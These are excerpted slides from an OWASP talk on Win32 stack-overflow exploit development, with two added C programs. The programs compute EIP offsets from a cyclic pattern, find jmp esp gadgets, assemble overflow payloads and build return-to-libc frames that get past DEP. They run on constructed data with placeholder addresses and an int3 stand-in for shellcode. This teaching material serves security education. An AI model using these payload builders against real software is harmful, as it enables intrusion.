1. Sending A for Ahuh.
Win32 Exploit development old school
2. The OWASP Foundation
http://www.owasp.org
Nahidul Kibria
Co-Leader, OWASP Bangladesh,
Principal Software Engineer,
Orbitax Bangladesh Ltd.
Writing code for fun and food. And a
security enthusiast.
@nahidupa
3. Sending A for Ahuh.
Win32 Exploit development old school
WTHell is this guy talking about?
15. X86 Registers
• EIP - Address of the next instruction to execute
• ESP - Address of the top of the stack
• EBP - Base pointer: address of the current stack frame (locals and
arguments are addressed relative to it)
• EAX/ECX/EDX - General-purpose registers holding the application's
variables and data (EAX also carries a function's return value)
51. Find jmp to esp
We control EIP (the overwritten return address) and the data on the stack
that ESP points to right after the ret; a "jmp esp" instruction at a fixed
address in a loaded module hands execution to that data.
Little Endian: Endianness is the order in which the bytes of a multi-byte
value are stored. In a little-endian system, the least significant byte is
stored first (at the lowest address). x86 is little-endian, so an address
written into the buffer has its bytes reversed: 0x11223344 goes in as the
bytes 44 33 22 11.
58. Step by step exploit
• Step 1 – Crashing the application
• Step 2 – Determine the offsets
• Step 3 – The pain begins: finding an instruction that will take us back
to the stack
• Step 4 – Writing Venetian shellcode (shellcode that survives the
ASCII-to-Unicode conversion of the input)
• Step 5 – Putting it all together
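The five steps above, together with the jmp esp search and little-endian packing from slide 51, as one self-contained program. This is an added example, not code from the talk: the crash EIP value, the module image bytes and the module base address are constructed for the demonstration, and the "shellcode" is a single int3 placeholder.

```c
/* Added example (not from the original slides): the old-school win32
 * stack-overflow workflow against constructed data, entirely offline.
 *   Step 2: cyclic pattern -> offset of the saved return address
 *   Step 3: scan a module image for jmp esp / call esp / push esp; ret
 *   Step 5: assemble [filler][ret address, LE][NOP sled][shellcode]
 * The EIP value, module bytes and base address are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PATTERN_MAX 5000

/* Metasploit-style cyclic pattern (Aa0Aa1Aa2...Ab0Ab1...): every 4-byte
 * window is unique, so the EIP seen at the crash pins down where in the
 * buffer the saved return address lives. Returns bytes written. */
size_t pattern_create(char *out, size_t len) {
    static const char up[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    static const char lo[] = "abcdefghijklmnopqrstuvwxyz";
    static const char dg[] = "0123456789";
    size_t n = 0;
    for (size_t i = 0; i < 26 && n < len; i++)
        for (size_t j = 0; j < 26 && n < len; j++)
            for (size_t k = 0; k < 10 && n < len; k++) {
                const char chunk[3] = { up[i], lo[j], dg[k] };
                for (size_t c = 0; c < 3 && n < len; c++)
                    out[n++] = chunk[c];
            }
    return n;
}

/* Store a 32-bit value little-endian, the way x86 reads it off the stack. */
void put_le32(uint8_t *dst, uint32_t v) {
    dst[0] = (uint8_t)(v);
    dst[1] = (uint8_t)(v >> 8);
    dst[2] = (uint8_t)(v >> 16);
    dst[3] = (uint8_t)(v >> 24);
}

/* Step 2: EIP at the crash is the 4 pattern bytes that overwrote the
 * saved return address, read little-endian. Locate them in the pattern;
 * returns the offset or -1 if the value is not from the pattern. */
long pattern_offset(uint32_t eip, size_t len) {
    char pat[PATTERN_MAX];
    if (len > PATTERN_MAX) len = PATTERN_MAX;
    size_t n = pattern_create(pat, len);
    uint8_t needle[4];
    put_le32(needle, eip);
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Step 3: scan a module image for an instruction that returns to the
 * stack: "jmp esp" (FF E4), "call esp" (FF D4) or "push esp; ret" (54 C3).
 * A hit inside a longer instruction is usable too: the CPU decodes from
 * wherever EIP lands. Returns base + offset, or 0 if nothing is found. */
uint32_t find_jmp_esp(const uint8_t *image, size_t len, uint32_t base) {
    for (size_t i = 0; i + 2 <= len; i++) {
        if ((image[i] == 0xFF && (image[i + 1] == 0xE4 || image[i + 1] == 0xD4)) ||
            (image[i] == 0x54 && image[i + 1] == 0xC3))
            return base + (uint32_t)i;
    }
    return 0;
}

/* Step 5: [filler up to the saved EIP][jmp esp address, LE][NOP sled]
 * [shellcode]. After "ret" pops our address, ESP points just past it,
 * i.e. at the sled, and jmp esp transfers control there. */
size_t build_payload(uint8_t *out, size_t cap, size_t offset, uint32_t ret,
                     const uint8_t *shellcode, size_t sc_len) {
    const size_t sled = 16;
    if (cap < offset + 4 + sled + sc_len) return 0;
    memset(out, 'A', offset);
    put_le32(out + offset, ret);
    memset(out + offset + 4, 0x90, sled);
    memcpy(out + offset + 4 + sled, shellcode, sc_len);
    return offset + 4 + sled + sc_len;
}

int main(void) {
    /* Constructed crash: the debugger showed EIP = 0x33614132 ("2Aa3"). */
    long off = pattern_offset(0x33614132u, 2000);
    /* Constructed module image at an assumed base; in practice you search
     * a module that is loaded at a fixed address, with a debugger plugin. */
    const uint8_t image[] = { 0x55, 0x8B, 0xEC, 0x90, 0xFF, 0xE4, 0xC3 };
    uint32_t jmp = find_jmp_esp(image, sizeof image, 0x7C800000u);
    const uint8_t sc[] = { 0xCC };   /* int3 stands in for real shellcode */
    uint8_t buf[256];
    size_t n = build_payload(buf, sizeof buf, (size_t)off, jmp, sc, sizeof sc);
    printf("offset=%ld jmp_esp=0x%08X payload=%zu bytes\n", off, jmp, n);
    return 0;
}
```

The offset search works because the pattern is built from a 26x26x10 alphabet, so any 4 consecutive bytes occur once in the first 20280 bytes; the little-endian reversal is what makes "2Aa3" in the buffer show up as 0x33614132 in EIP, and the same reversal is applied on the way back when the gadget address is written.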
68. Data Execution Prevention (DEP)
DEP was introduced in Windows XP Service Pack 2.
The basic idea is to
prevent an application or service from executing code that lives in a
memory region marked non-executable (NX), such as the stack or the heap.
69. DEP comes in two types:
hardware-enforced DEP, for CPUs that can mark memory
pages as non-executable,
and software-enforced DEP, which offers more limited protection on
CPUs that lack hardware support.
70. DEP can be bypassed by “Return to libc”
Reference: http://www.infosecwriters.com/text_resources/pdf/return-to-libc.pdf
We still overwrite the return address, but with the address of an existing
function in libc (on Windows, in any loaded DLL) instead of a pointer to our
shellcode, place the correct arguments for it on the stack, and let that
function do the work for us.
Since the function's code lives in the executable text section of the library
and not on the stack, nothing is executed from a non-executable page, and
DEP's protection of the stack is bypassed.
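How the stack has to be laid out for that to work on 32-bit x86 (cdecl), as an added example that is not part of the slides. The addresses are placeholders chosen for illustration, not real library addresses; the point is the ordering of [function address][return-after address][arguments] that the CPU's ret and the callee's argument access impose.

```c
/* Added example (not from the original slides): a return-to-libc frame
 * for 32-bit x86. When the vulnerable function executes "ret", the CPU
 * pops our overwritten value into EIP. The library function then expects
 * its own return address at [ESP] and its first argument at [ESP+4], so
 * the buffer must be:
 *   [filler up to saved EIP][&func][where func returns to][arg0][arg1]...
 * Only addresses and data are read from the stack; no stack byte is ever
 * executed, which is why DEP does not interfere. All addresses below are
 * placeholders (assumptions), not real library addresses. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static void put_le32(uint8_t *dst, uint32_t v) {
    dst[0] = (uint8_t)(v);      dst[1] = (uint8_t)(v >> 8);
    dst[2] = (uint8_t)(v >> 16); dst[3] = (uint8_t)(v >> 24);
}

static uint32_t get_le32(const uint8_t *src) {
    return (uint32_t)src[0] | ((uint32_t)src[1] << 8) |
           ((uint32_t)src[2] << 16) | ((uint32_t)src[3] << 24);
}

/* Build the frame; returns its total length, or 0 if it does not fit. */
size_t build_ret2libc(uint8_t *out, size_t cap, size_t offset,
                      uint32_t func, uint32_t ret_after,
                      const uint32_t *args, size_t nargs) {
    size_t need = offset + 8 + 4 * nargs;
    if (cap < need) return 0;
    memset(out, 'A', offset);                 /* filler up to saved EIP */
    put_le32(out + offset, func);             /* popped into EIP by ret  */
    put_le32(out + offset + 4, ret_after);    /* [ESP] inside func       */
    for (size_t i = 0; i < nargs; i++)        /* [ESP+4], [ESP+8], ...   */
        put_le32(out + offset + 8 + 4 * i, args[i]);
    return need;
}

/* Model of what happens at the ret and what the callee then sees. */
typedef struct { uint32_t eip; uint32_t ret_addr; uint32_t arg0; } callee_view;

callee_view simulate_ret(const uint8_t *frame, size_t offset) {
    callee_view v;
    v.eip = get_le32(frame + offset);           /* ESP -> saved EIP slot */
    v.ret_addr = get_le32(frame + offset + 4);  /* ESP after the pop     */
    v.arg0 = get_le32(frame + offset + 8);      /* ESP+4 inside func     */
    return v;
}

int main(void) {
    /* Placeholder values: a system()-style function, a return target, and
     * a pointer to a command string the exploit placed at a known address. */
    const uint32_t FUNC = 0x11111111u, RET = 0x22222222u, ARG = 0x33333333u;
    uint8_t buf[128];
    size_t n = build_ret2libc(buf, sizeof buf, 12, FUNC, RET, &ARG, 1);
    callee_view v = simulate_ret(buf, 12);
    printf("frame=%zu bytes eip=0x%08X ret=0x%08X arg0=0x%08X\n",
           n, v.eip, v.ret_addr, v.arg0);
    return 0;
}
```

The slot labelled ret_after is simply the next address the CPU returns into once the library function finishes, so chaining a second call (for example something that terminates the process cleanly) is the same construction repeated at that position.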